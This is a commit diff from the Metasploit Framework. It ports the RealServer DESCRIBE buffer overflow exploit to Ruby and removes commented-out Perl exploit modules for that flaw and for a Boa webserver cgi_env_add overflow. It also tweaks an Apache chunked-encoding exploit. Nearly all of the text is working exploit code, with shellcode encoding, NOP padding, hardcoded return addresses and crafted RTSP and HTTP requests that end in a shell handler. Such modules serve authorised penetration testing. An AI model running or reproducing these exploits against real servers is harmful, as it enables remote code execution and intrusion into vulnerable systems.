ported realserver describe exploit
git-svn-id: file:///home/svn/framework3/trunk@4018 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
abf2e057c8
commit
7f981714a6
|
@ -1,256 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'BOA cgi_env_add Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits an undisclosed flaw in the Boa
|
||||
webserver. The latest release branch is not vulnerable to
|
||||
this flaw, however, there are a number of embedded devices
|
||||
that still use this vulnerable version, such as Axis
|
||||
webcams. This exploit is pretty unreliable due to the
|
||||
unpredictability of certain variables that influence the
|
||||
env_buffer's, such as PATH, hostname, and other such things.
|
||||
|
||||
},
|
||||
'Author' => [ 'skape', 'thief <thief@hick.org>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 140,
|
||||
'BadChars' => "\x00\x0a\x0d",
|
||||
'PrependEncoder' => "\x83\xec\x7f",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => '',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::boa_cgi_env_add;
|
||||
|
||||
use strict;
|
||||
use base "Msf::Exploit";
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced =
|
||||
{
|
||||
};
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'BOA cgi_env_add Overflow',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' =>
|
||||
[
|
||||
'skape <mmiller [at] hick.org>',
|
||||
'thief <thief [at] hick.org>'
|
||||
],
|
||||
'Description' =>
|
||||
Pex::Text::Freeform(qq{
|
||||
This module exploits an undisclosed flaw in the Boa webserver. The latest
|
||||
release branch is not vulnerable to this flaw, however, there are a number
|
||||
of embedded devices that still use this vulnerable version, such as Axis webcams.
|
||||
This exploit is pretty unreliable due to the unpredictability of certain variables
|
||||
that influence the env_buffer's, such as PATH, hostname, and other such things.
|
||||
}),
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'linux' ],
|
||||
'Priv' => 0,
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [ 1, 'ADDR', 'The target proxy server address' ],
|
||||
'RPORT' => [ 1, 'PORT', 'The target proxy server port' ],
|
||||
'CGI' => [ 1, 'DATA', 'The CGI path to use', '/cgi-bin/io/virtualinput.cgi' ],
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 140,
|
||||
'MaxNops' => 0,
|
||||
'BadChars' => "\x00\x0a\x0d",
|
||||
'Keys' => [ '+findsock' ],
|
||||
'PrependEncoder' => "\x83\xec\x7f", # sub $0x7f, %esp
|
||||
},
|
||||
'Refs' =>
|
||||
[
|
||||
# 0day!
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Boa/0.92o (Linux)', 0xbffffc30, 0xbffffba0 ],
|
||||
[ 'Test', 0x41414141, 0x41414141 ],
|
||||
],
|
||||
'Keys' => [ 'boa' ],
|
||||
};
|
||||
|
||||
sub new
|
||||
{
|
||||
my $class = shift;
|
||||
my $self;
|
||||
|
||||
$self = $class->SUPER::new(
|
||||
{
|
||||
'Info' => $info,
|
||||
'Advanced' => $advanced,
|
||||
},
|
||||
@_);
|
||||
|
||||
return $self;
|
||||
}
|
||||
|
||||
sub Check
|
||||
{
|
||||
my $self = shift;
|
||||
my $code = "Safe";
|
||||
my $resp;
|
||||
my $s;
|
||||
|
||||
$s = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $self->GetVar('RHOST'),
|
||||
'PeerPort' => $self->GetVar('RPORT'),
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'));
|
||||
|
||||
if (not defined($s))
|
||||
{
|
||||
return $self->CheckCode('Connect');
|
||||
}
|
||||
|
||||
$s->Send("HEAD / HTTP/1.0\r\n\r\n");
|
||||
|
||||
while (defined($resp = $s->Recv(-1, 5)))
|
||||
{
|
||||
my @lines = split /\n/, $resp;
|
||||
|
||||
foreach my $line (@lines)
|
||||
{
|
||||
my ($var, $val) = split /: /, $line;
|
||||
|
||||
$val =~ s/\r//;
|
||||
$val =~ s/\n//;
|
||||
|
||||
if ($var eq 'Server')
|
||||
{
|
||||
$code = "Appears" if ($val eq 'Boa/0.92o');
|
||||
}
|
||||
}
|
||||
|
||||
last if ($resp =~ "\r\n\r\n" or length($resp) == 0);
|
||||
}
|
||||
|
||||
$s->Close();
|
||||
|
||||
if ($code eq 'Appears')
|
||||
{
|
||||
$self->PrintLine("[*] This host appears to be vulnerable.");
|
||||
}
|
||||
else
|
||||
{
|
||||
$self->PrintLine("[*] This host does not appear to be vulnerable.");
|
||||
}
|
||||
|
||||
return $self->CheckCode($code);
|
||||
}
|
||||
|
||||
sub Exploit
|
||||
{
|
||||
my $self = shift;
|
||||
my $targetIdx = $self->GetVar('TARGET');
|
||||
my $payload = $self->GetVar('EncodedPayload');
|
||||
my $shellcode = $payload->Payload;
|
||||
my $randomText = undef;
|
||||
my $request = undef;
|
||||
my $target = $self->Targets->[$targetIdx];
|
||||
my $chunk = undef;
|
||||
my $final = undef;
|
||||
my $null = $target->[2];
|
||||
my $ret = $target->[1];
|
||||
my $cgi = $self->GetVar('CGI');
|
||||
my $pad = undef;
|
||||
my $s = undef;
|
||||
|
||||
$self->PrintLine('[*] Trying exploit target: ' . $target->[0]);
|
||||
|
||||
# Build out the request
|
||||
$randomText = Pex::Text::AlphaNumText(2039);
|
||||
$pad = ($ret - $null - 0xb) - length($shellcode);
|
||||
$chunk = "A" x 1858 . pack("V", $null - 0x74f);
|
||||
$final = $self->MakeNops($pad) . $shellcode . pack("V", $ret - length($shellcode));
|
||||
|
||||
$request =
|
||||
"GET $cgi HTTP/1.0\r\n" .
|
||||
"01: $randomText\r\n" .
|
||||
"02: $randomText\r\n" .
|
||||
"03: $randomText\r\n" .
|
||||
"04: $randomText\r\n" .
|
||||
"05: $randomText\r\n" .
|
||||
"06: $randomText\r\n" .
|
||||
"07: $randomText\r\n" .
|
||||
"08: $chunk\r\n" .
|
||||
"OWNED: $final\r\n" .
|
||||
"\r\n";
|
||||
|
||||
# Connect
|
||||
$s = Msf::Socket::Tcp->new(
|
||||
'PeerAddr' => $self->GetVar('RHOST'),
|
||||
'PeerPort' => $self->GetVar('RPORT'),
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'));
|
||||
|
||||
if (not defined($s) or
|
||||
$s->IsError)
|
||||
{
|
||||
$self->PrintLine('Error creating socket: '.$s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
$s->Send($request);
|
||||
|
||||
$self->Handler($s) if (defined($s));
|
||||
}
|
||||
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -1,195 +0,0 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'RealServer Describe Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in RealServer 7/8/9
|
||||
and was based on Johnny Cyberpunk's THCrealbad exploit. This
|
||||
code should reliably exploit Linux, BSD, and Windows-based
|
||||
servers.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '4468'],
|
||||
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
|
||||
[ 'MIL', '51'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Automatic Targetting',
|
||||
{
|
||||
'Platform' => 'linux, bsd, win32',
|
||||
'Ret' => 0x0,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 20 2002',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::realserver_describe_linux;
|
||||
use base 'Msf::Exploit';
|
||||
use strict;
|
||||
use Pex::Text;
|
||||
|
||||
my $advanced = { };
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'RealServer Describe Buffer Overflow',
|
||||
'Version' => '$Revision$',
|
||||
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
|
||||
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'linux', 'bsd', 'win32' ],
|
||||
'Priv' => 1,
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
||||
'RPORT' => [1, 'PORT', 'The RTSP port', 554],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff :&?.=",
|
||||
'Keys' => ['+findsock'],
|
||||
|
||||
},
|
||||
|
||||
'Description' => Pex::Text::Freeform(qq{
|
||||
This module exploits a buffer overflow in RealServer 7/8/9 and was based
|
||||
on Johnny Cyberpunk's THCrealbad exploit. This code should reliably exploit
|
||||
Linux, BSD, and Windows-based servers.
|
||||
}),
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '4468'],
|
||||
['URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
|
||||
['MIL', '51'],
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
'Targets' => [['Universal Target']],
|
||||
|
||||
'Keys' => ['realserver'],
|
||||
|
||||
'DisclosureDate' => 'Dec 20 2002',
|
||||
};
|
||||
|
||||
sub new {
|
||||
my $class = shift;
|
||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
||||
return($self);
|
||||
}
|
||||
|
||||
sub Check {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return $self->CheckCode('Connect');
|
||||
}
|
||||
|
||||
$s->Send("OPTIONS / RTSP/1.0\r\n\r\n");
|
||||
|
||||
my $res = $s->Recv(-1, 5);
|
||||
$s->Close();
|
||||
|
||||
if ($res =~ m/^Server:([^\n]+)/sm)
|
||||
{
|
||||
my $svr = $1;
|
||||
$svr =~ s/(^\s+|\r|\s+$)//g;
|
||||
$self->PrintLine("[*] $svr");
|
||||
return $self->CheckCode('Detected');
|
||||
}
|
||||
return $self->CheckCode('Safe');
|
||||
}
|
||||
|
||||
sub Exploit {
|
||||
my $self = shift;
|
||||
my $target_host = $self->GetVar('RHOST');
|
||||
my $target_port = $self->GetVar('RPORT');
|
||||
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
|
||||
|
||||
$self->PrintLine("[*] RealServer universal exploit launched against $target_host");
|
||||
$self->PrintLine("[*] Kill the master rmserver pid to prevent shell disconnect");
|
||||
|
||||
my $encoded;
|
||||
foreach (split(//, $shellcode)){ $encoded .= sprintf("%%%.2x", ord($_)) }
|
||||
|
||||
my $req = "DESCRIBE /". ("../" x 560) . "\xcc\xcc\x90\x90". $encoded. ".smi RTSP/1.0\r\n\r\n";
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $target_host,
|
||||
'PeerPort' => $target_port,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
if ($s->IsError) {
|
||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
||||
return;
|
||||
}
|
||||
|
||||
$s->Send($req);
|
||||
|
||||
$self->Handler($s);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,78 @@
|
|||
require 'msf/core'
|
||||
require 'msf/core/exploit/http'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'RealServer Describe Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in RealServer 7/8/9
|
||||
and was based on Johnny Cyberpunk's THCrealbad exploit. This
|
||||
code should reliably exploit Linux, BSD, and Windows-based
|
||||
servers.
|
||||
},
|
||||
'Author' => 'hdm',
|
||||
'Version' => '$Revision: 3110 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '4468'],
|
||||
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
|
||||
[ 'MIL', '51'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Universal',
|
||||
{
|
||||
'Platform' => [ 'linux', 'bsd', 'win' ]
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 20 2002',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def check
|
||||
response = request(
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'RTSP/1.0',
|
||||
'uri' => '/')
|
||||
|
||||
if response and response['Server']
|
||||
print_status("Found RTSP: #{response['Server']}")
|
||||
return Exploit::CheckCode::Detected
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("RealServer universal exploit launched against #{rhost}")
|
||||
print_status("Kill the master rmserver pid to prevent shell disconnect")
|
||||
|
||||
encoded = payload.encoded.gsub(/./) { |char| "%%%.2x" % char[0] }
|
||||
|
||||
request(
|
||||
'method' => 'DESCRIBE',
|
||||
'proto' => 'RTSP/1.0',
|
||||
'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi")
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -148,7 +148,7 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
response = request(:uri => '/')
|
||||
response = request('uri' => '/')
|
||||
|
||||
if response.nil?
|
||||
print_status("No response to request")
|
||||
|
@ -229,14 +229,14 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
|
|||
|
||||
# Build the request
|
||||
request(
|
||||
:uri => '/',
|
||||
:headers =>
|
||||
'uri' => '/',
|
||||
'headers' =>
|
||||
{
|
||||
'Host' => "#{vhost}:#{rport}",
|
||||
'Transfer-Encoding' => "CHUNKED"
|
||||
},
|
||||
:body => "FFFFFFF0 " + pattern,
|
||||
:timeout => 2
|
||||
'body' => "FFFFFFF0 " + pattern,
|
||||
'timeout' => 2
|
||||
)
|
||||
|
||||
# Check the handler
|
||||
|
|
Loading…
Reference in New Issue